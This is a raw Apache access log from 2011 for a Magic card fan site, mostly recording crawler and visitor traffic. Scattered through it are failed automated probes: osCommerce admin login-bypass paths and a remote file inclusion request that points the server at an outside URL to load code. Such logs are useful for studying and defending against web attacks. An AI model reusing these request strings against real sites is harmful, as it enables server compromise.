212.92.23.172 - - [03/Sep/2011:12:42:51 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','12','6','%22%2Fadmin%2Ffile_manager.php%22++.pl','',%20'00eed28236f5090f76f7db7f414ff26cfaa1e5ad8f1ab45b67bf',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 574 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:42:51 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:42:52 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.182.104.128 - - [03/Sep/2011:12:43:26 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php HTTP/1.1" 404 368 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:43:27 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:43:27 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:44:29 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:44:30 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:44:30 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:37 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:37 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:38 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:38 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:46 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:50:46 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
212.92.23.172 - - [03/Sep/2011:12:51:36 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:51:36 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:51:36 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.92.23.172 - - [03/Sep/2011:12:51:37 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
46.182.104.128 - - [03/Sep/2011:12:54:39 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:54:39 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:54:39 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:55:02 +0000] "GET /Account/access_log.txt/admin/banner_manager.php/login.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:55:02 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
46.182.104.128 - - [03/Sep/2011:12:55:02 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:37 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:37 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:37 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:38 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:38 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:55:38 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:39 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','8','10','%22%2Fadmin%2Ffile_manager.php%22++.fr','',%20'00eb96be7f9a6f742d7b49979d1868b20edffba9b81ff06714f9',%200)/admin/banner_manager.php/login.php HTTP/1.1" 404 576 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:40 +0000] "GET /admin/banner_manager.php/login.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:41 +0000] "GET /Account/admin/banner_manager.php/login.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:42 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','8','10','%22%2Fadmin%2Ffile_manager.php%22++.fr','',%20'00c43287669a6f742d7b49979d1868b20edffba9b830545e0d31',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 574 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:43 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:58:44 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:59:54 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','8','10','%22%2Fadmin%2Ffile_manager.php%22++.fr','',%20'00f7c336179a6f742d7b49979d1868b20edffba9b803a5ef7ec4',%200)/admin/categories.php/login.php HTTP/1.1" 404 572 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:59:55 +0000] "GET /admin/categories.php/login.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
27.50.95.50 - - [03/Sep/2011:12:59:55 +0000] "GET /Account/admin/categories.php/login.php HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows;U;Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1"
95.108.158.245 - - [03/Sep/2011:13:58:50 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
65.52.104.89 - - [03/Sep/2011:17:10:03 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [03/Sep/2011:17:10:37 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
77.88.26.27 - - [03/Sep/2011:17:12:08 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [03/Sep/2011:20:57:11 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
178.63.121.8 - - [03/Sep/2011:21:59:59 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','7','%2Fcatalog%2Fimages%2Ffile_manager.php','',%20'00ae8b2590f1c61f01b6c62363f0ea3ff62ea717be5aec719df3',%200)/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 564 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:21:59:59 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:21:59:59 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:00 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','11','7','%2Fcatalog%2Fimages%2Ffile_manager.php','',%20'009eb92dd3f1c61f01b6c62363f0ea3ff62ea717be6ade79d933',%200)/admin/file_manager.php/login.php HTTP/1.1" 404 566 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:00 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:00 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:39 +0000] "GET /Account/access_log.txt/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 368 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:39 +0000] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 345 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:39 +0000] "GET /Account/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:43 +0000] "GET /Account/access_log.txt/admin/file_manager.php/login.php HTTP/1.1" 404 370 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:43 +0000] "GET /admin/file_manager.php/login.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
178.63.121.8 - - [03/Sep/2011:22:00:43 +0000] "GET /Account/admin/file_manager.php/login.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.52.143.32 - - [03/Sep/2011:22:44:46 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
81.52.143.32 - - [03/Sep/2011:22:44:50 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
208.115.111.73 - - [03/Sep/2011:23:18:13 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
77.88.26.27 - - [04/Sep/2011:00:09:16 +0000] "GET /?C=D;O=A HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
208.115.111.73 - - [04/Sep/2011:00:19:28 +0000] "GET /?C=D;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
38.108.67.13 - - [04/Sep/2011:05:09:26 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
38.108.67.13 - - [04/Sep/2011:05:09:26 +0000] "GET /Account/AwstatsDatabase/ HTTP/1.0" 404 339 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)"
95.108.158.245 - - [04/Sep/2011:05:11:44 +0000] "GET /icons/blank.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
65.52.104.89 - - [04/Sep/2011:05:35:10 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [04/Sep/2011:05:36:02 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 239315 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.72.210 - - [04/Sep/2011:05:52:05 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [04/Sep/2011:05:52:05 +0000] "GET /Account/ HTTP/1.1" 200 927 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.88.26.27 - - [04/Sep/2011:09:01:15 +0000] "GET /?C=N;O=D HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [04/Sep/2011:10:54:31 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
95.108.158.245 - - [04/Sep/2011:11:30:27 +0000] "GET /icons/back.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
210.93.117.43 - - [04/Sep/2011:11:33:22 +0000] "GET //include/lib.inc.php?site_path=http://mindywilsonphotography.com/v1site_images/id1.gif?? HTTP/1.1" 404 334 "-" "Mozilla/5.0"
210.93.117.43 - - [04/Sep/2011:11:33:22 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','19','1','%22lib.inc.php%22','',%20'00dba4df26e6ef93643a3b7ce1082fb087c0ad79322fc4cb954f',%200)//include/lib.inc.php?site_path=http://mindywilsonphotography.com/v1site_images/id1.gif?? HTTP/1.1" 404 545 "-" "Mozilla/5.0"
210.93.117.43 - - [04/Sep/2011:11:33:22 +0000] "GET /Account/access_log.txt%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fpojo.findmagiccards.com%2FAccount%2Faccess_log.txt','18','10','%22lib.inc.php%22','',%20'00d900160551330c1aea59720532fa6487fe57591c2d6002b821',%200)//include/lib.inc.php?site_path=http://mindywilsonphotography.com/v1site_images/id1.gif?? HTTP/1.1" 404 546 "-" "Mozilla/5.0"
210.93.117.43 - - [04/Sep/2011:11:33:22 +0000] "GET /Account//include/lib.inc.php?site_path=http://mindywilsonphotography.com/v1site_images/id1.gif?? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
67.195.115.166 - - [04/Sep/2011:12:40:03 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [04/Sep/2011:12:40:04 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [04/Sep/2011:15:02:16 +0000] "GET /?C=D;O=A HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.80.194.36 - - [04/Sep/2011:16:15:40 +0000] "GET / HTTP/1.0" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; IEMB3; (R1 1.5); .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
95.108.158.245 - - [04/Sep/2011:17:08:01 +0000] "GET /icons/folder.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
68.84.112.4 - - [04/Sep/2011:18:24:02 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/featured%20writers/Zandi/2004/12-10.html" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
68.84.112.4 - - [04/Sep/2011:18:24:02 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
68.84.112.4 - - [04/Sep/2011:18:24:02 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
68.84.112.4 - - [04/Sep/2011:18:24:02 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1"
67.195.115.166 - - [04/Sep/2011:21:38:53 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [04/Sep/2011:21:38:54 +0000] "GET /Account/access_log.txt HTTP/1.0" 200 243381 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
97.119.7.196 - - [05/Sep/2011:02:48:26 +0000] "GET / HTTP/1.1" 200 749 "http://www.pojo.com/magic/index.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:26 +0000] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://pojo.findmagiccards.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:26 +0000] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://pojo.findmagiccards.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:26 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:29 +0000] "GET /Account/ HTTP/1.1" 200 927 "http://pojo.findmagiccards.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:29 +0000] "GET /icons/back.gif HTTP/1.1" 200 216 "http://pojo.findmagiccards.com/Account/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:29 +0000] "GET /icons/text.gif HTTP/1.1" 200 229 "http://pojo.findmagiccards.com/Account/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:30 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
97.119.7.196 - - [05/Sep/2011:02:48:32 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 246203 "http://pojo.findmagiccards.com/Account/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SearchToolbar 1.2; GTB7.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMNTDF; .NET4.0C; InfoPath.3)"
65.52.104.89 - - [05/Sep/2011:03:21:28 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
65.52.104.89 - - [05/Sep/2011:03:22:01 +0000] "GET /Account/access_log.txt HTTP/1.1" 200 246718 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
88.131.106.22 - - [05/Sep/2011:04:23:57 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.22 - - [05/Sep/2011:04:24:00 +0000] "GET /Account/ HTTP/1.0" 200 927 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
119.63.196.24 - - [05/Sep/2011:05:38:59 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
110.174.23.27 - - [05/Sep/2011:06:12:39 +0000] "GET /favicon.ico HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"
123.125.71.95 - - [05/Sep/2011:06:45:37 +0000] "GET / HTTP/1.1" 200 749 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
67.195.115.166 - - [05/Sep/2011:07:21:36 +0000] "GET /robots.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.166 - - [05/Sep/2011:07:21:37 +0000] "GET /Account/?C=N;O=A HTTP/1.0" 200 927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.125.72 - - [05/Sep/2011:09:01:06 +0000] "GET /robots.txt HTTP/1.1" 404 325 "-" "-"
